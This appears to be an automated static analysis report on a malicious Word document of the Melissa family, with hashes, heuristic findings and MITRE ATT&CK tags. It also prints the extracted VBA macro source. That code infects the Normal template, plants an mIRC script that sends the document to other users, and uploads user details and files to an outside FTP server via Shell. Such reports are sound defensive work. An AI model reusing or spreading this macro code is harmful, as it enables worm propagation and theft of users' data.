Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cbe4470757c70e7f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 48.5 KB
Created: 1999-03-28 19:59:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 0a42ca1debbad4c5a066c6f71ebcf60e
SHA-1: c81159fb5c3f4f8cee60b705593f4ac32ca3d6f8
SHA-256: cbe4470757c70e7f4d7dfb6951497431fd05406c491653f618b2cc4ef1486a37
Risk Score: 348

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

This document contains a malicious VBA macro that executes automatically upon opening, as indicated by the AutoOpen and Document_Open heuristic firings. The macro attempts to download and execute a second-stage payload, evidenced by the critical Shell() call heuristic and the detection of a known malware family (Doc.Trojan.Melissa-17). The script also searches for specific directories and files, suggesting a downloader or dropper functionality.

Heuristics (8)

  • ClamAV: Doc.Trojan.Melissa-17 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Melissa-17
  • VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 21984 bytes
SHA-256: c10fa7539adff27029c545c1935a97ed7c44e0a9b0a9fd9d2ae179358dc39f30
Detection: ClamAV: Doc.Trojan.Sin-4
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
FHUSKIXUBSB:  Options.SaveNormalPrompt = False
GMUPAVB:  Randomize Timer
SMPLUULM:  LordArz = "Technological Illusions"
OOOOOO = UUUUUU
CFUTJHUEDFO:  NormInstalled = False
WEXYEXFSEF:  ActInstalled = False
WWLEASRN:  Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
P = II
FTHPOBOK:  Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule
MUAVFYVTLP:
FOUAVMSNNUA:  NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
DKHRQWTMY:  AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
GBFSIOFIEK:
YIOYNCKGJRK:  If UCase(NI) = "ON ERROR RESUME NEXT" Then NormInstalled = True
VVGHWNDVNRP:  If UCase(AI) = "ON ERROR RESUME NEXT" Then ActInstalled = True
FLNGWGMF:
YGKRRUA:  If NormInstalled = False Then
CXLBDBWTKFR:      Set Infection = NormCarrier
MYXEQPOR:      Set Carrier = ActCarrier
MMM = WWW
RYOLEK:  Else
YFHSPSPGOJ:      Set Infection = ActCarrier
CDLDJGIYU:      Set Carrier = NormCarrier
KPUNGOUGIE:  End If
LBNVPIRNG:
ECBMAUO:
GNTIWQIGMVB:
TVVYFXCQFKS:  DoEvents
WWWWW = RRR
NESQKHFD:
OCVIRI:  Close
RJQONLUA:  Tr1 = Dir(CurDir & "\script.ini", vbNormal)
YAKWQOFDH:  Tr2 = UCase(Right(CurDir, 8))
PPPPPP = OOOOOO
DPMTMCQAYH:  Tr3 = Dir("C" & Chr(58) & "\MIRC", vbDirectory)
CKYPUICTVV:
DDDDDD = MMMMMM
TXRMBWKVVC:  If Tr1 <> "" Then SDir = CurDir & "\script.ini"
DMXARFM:  If Tr2 = "DOWNLOAD" Then SDir = CurDir & "\..\Script.ini"
KENUEHFST:  If Tr3 <> "" Then SDir = "C" & Chr(58) & "\MIRC\Script.ini"
GGIWCFLSD:
PARODYH:  If SDir <> "" Then
WUOMMQKHFL:      Open SDir For Output As #1
SVIHHCB:      Print #1, "n0=on 1" & Chr(59) & "JOIN" & Chr(59) & "#" & Chr(59) & "if ( $me != $nick ) { /dcc send $nick " & ThisDocument.FullName & " }"
AMKUMTXORTJ:      Close #1
SKNHHL:  End If
NJWTRAXB:  DoEvents
VAWAQJWDEJJ:
QCBODS:  WinPath = Environ("WINDIR")
JJ = VV
AHHCQOX:
KORWJNJKEG:  If Application.Tasks.Exists("Sockets Window") = True And System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = "" Then
YFHFSE:      With Application.FileSearch
CCCC = RRR
AJYKITXFW:              .FileName = "WS_FTP.ini"
OPXVWA:              .LookIn = "C" & Chr(58) & "\"
BWRIOEHGVJV:              .SearchSubFolders = True
SQRVFIKLGW:              .MatchTextExactly = True
ACHSWBVWEHJ:              .FileType = msoFileTypeAllFiles
QDNMXADLHKM:              .Execute
QNKFPOYU:              WsPath = .FoundFiles(1)
QQKGGS:      End With
AMSFWLF:
QHXFRK:      DoEvents
QBXXVQV:
RPMUYO:      If ActiveDocument.HasPassword = True Then BCK = True
GKYFAL:
MPDAGG:      DoEvents
LPFAVEMQW:      Open WinPath & "\" & Application.UserName & ".dat" For Output As #10
JWILUVRD:      Print #10, Application.UserName
K = PP
DVEWYTD:      Print #10, Application.UserAddress
ICPAJP:      If BCK = True Then Print #10, ActiveDocument.FullName
HCKNQVQNT:      If WsPath <> "" Then Print #10, "WS_FTP"
XUSNYTXYPFR:      Close #10
PPPPPP = PPPPP
UGOCOVFE:      Open WinPath & "\Command.$$$" For Output As #8
VMHQLBVRQ:      Print #8, "o ftp.xoom.com"
CDGXMEQ:      Print #8, "User SingOfScream"
MMQUKVSIXHQ:      Print #8, "Pass DIG001"
CDCDTGSSV:      Print #8, "binary"
BBB = XXXXXX
CTKKXEVQSGC:      Print #8, "put " & Application.UserName & ".dat"
XFUYWRR:      If WsPath <> "" Then Print #8, "put " & WsPath
XEWXWR:      If BCK = True Then Print #8, "put " & ActiveDocument.FullName
BCTVRVNMG:          Print #8, "quit"
WCVRDJBGJJ:      Close
FUGILSRSHF:      Shell WinPath & "\FTP.exe -n -s:Command.$$$"
KUCANVEQ:      MsgBox "file sent"
JCXAAM:      System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = "Your PC is infected  (UP THE IRONS)"
JBYUHEAUF:  End If
J = C
EXYILKMVPUB:  For x = 1 To ThisDocument.Variables.Count
AXQQAD:  
... (truncated)